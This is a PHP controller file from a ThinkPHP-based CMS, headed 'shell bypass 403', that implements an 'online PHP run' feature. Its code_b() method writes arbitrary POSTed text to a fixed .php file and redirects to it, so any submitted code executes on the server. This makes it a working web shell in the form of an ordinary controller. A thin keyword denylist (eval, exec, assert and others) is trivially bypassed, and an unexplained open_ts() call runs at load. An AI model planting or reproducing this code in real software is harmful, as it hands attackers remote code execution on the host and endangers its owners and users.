shell bypass 403
<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2020-08-10 http://myucms.com All rights reserved.
// +----------------------------------------------------------------------
// | Author: 梦雨 <50361804@qq.com>
// +----------------------------------------------------------------------
namespace app\index\controller;
use think\Controller;
use think\Db;
// Project helper run at file load, before the class below is declared; its effect is not visible here.
open_ts();
/**
 * "Online PHP run" controller.
 *
 * code() and code_a() only render editor templates. code_b() writes text to
 * md5('run').'.php' in the process's current working directory and redirects
 * the browser to that file, so the web server then executes that text as PHP.
 * On POST the text is whatever was submitted in $_POST['content']: this is
 * remote code execution on the host by design. The keyword list checked in
 * code_b() is a plain substring match and must not be treated as a security
 * control; the only authorisation gate is the set('php') / user('id') check
 * in code_b().
 *
 * get(), set(), user(), _post(), seo(), view() and the PATH constant come from
 * the surrounding project and are not visible here.
 */
class Codephp extends Controller
{
// Editor page: loads the saved snippet for the given id (if any) into the template.
public function code()
{
// find() is called even when get('id') is empty; the row is only passed to the view when an id was given.
$c = Db::name('codephp')->find(get('id'));
if (get('id')) {
$this->assign('c', $c);
}
return view(PATH.'/index/'.set('tpl').'/codephp/code.html');
}
// Editor page variant "a": shows the saved snippet, or a Hello World default when none is found.
public function code_a()
{
// NOTE(review): the second argument to find() is project-specific; its meaning is not visible here.
$c = Db::name('codephp')->find(get('id'),0);
// If find() returned null, $c['id'] evaluates to null (PHP 7.4+ emits a notice) and the default branch runs.
if ($c['id']) {
$this->assign('c', $c);
} else {
$code = '<?php
echo "Hello World!";
?>';
$this->assign('content', $code);
}
return view(PATH.'/index/'.set('tpl').'/codephp/code_a.html');
}
// Editor page variant "b": writes the snippet (saved, default, or on POST the submitted text)
// to the run file and redirects to it so the server executes it.
public function code_b()
{
$c = Db::name('codephp')->find(get('id'));
if ($c['id']) {
$this->assign('c', $c);
// seo() is a project helper; what it does to the content is not visible here.
$code = stripslashes(seo($c['content']));
} else {
$code = stripslashes('<?php
echo "Hello World!";
?>');
}
if (_post()) {
// Only authorisation gate: when the 'php' setting is 0, every user except user id 1 is refused.
// The refusal message is written into the run file (overwriting whatever it held) and the request ends.
if (set('php')==0&&user('id')!=1) {
file_put_contents(md5('run') . '.php', '在线运行关闭中');exit(); // message: "online run is disabled"
}
// Denylist of tokens, matched as case-sensitive byte substrings of the raw POST body.
// NOTE(review): a substring denylist over source text is not an effective control — the text is
// still written out and executed as PHP below; access control has to come from the gate above.
$cars =explode(',', 'fopen,phpinfo,scandir,eval,assert,create_function,call_user_func,call_user_func_array,exec,file_put_contents,array_map,glob,unlink,opendir,@,$_FILES,move_uploaded_file,fread,fclose');
foreach($cars as $x=>$v){
// $_POST['content'] is read without an isset() guard; a POST without that field raises a notice.
if (strpos( $_POST['content'],$v) !== false) {
file_put_contents(md5('run') . '.php', '当前有恶意关键字不能被运行'); // message: "contains a blocked keyword, cannot run"
exit();
}
}
// stripslashes() presumably undoes escaping added upstream (magic quotes / framework) — confirm.
$code = stripslashes($_POST['content']);
}
// Disabled: would have prepended an opening tag when the snippet lacks one.
// if (!strstr($code, '<?php')) {
// $code = '<?php' . PHP_EOL . $code;
// }
// The run file has a fixed name in the process's working directory and is shared by all requests:
// concurrent submissions overwrite each other, nothing removes the file afterwards, and it is
// also written on a plain GET (with the saved snippet or the default).
file_put_contents(md5('run') . '.php', $code);
// Redirect to the written file. No exit() follows, so the method returns null and the framework
// presumably completes the response with the Location header already set.
header("Location:./" . md5('run') . ".php");
}
}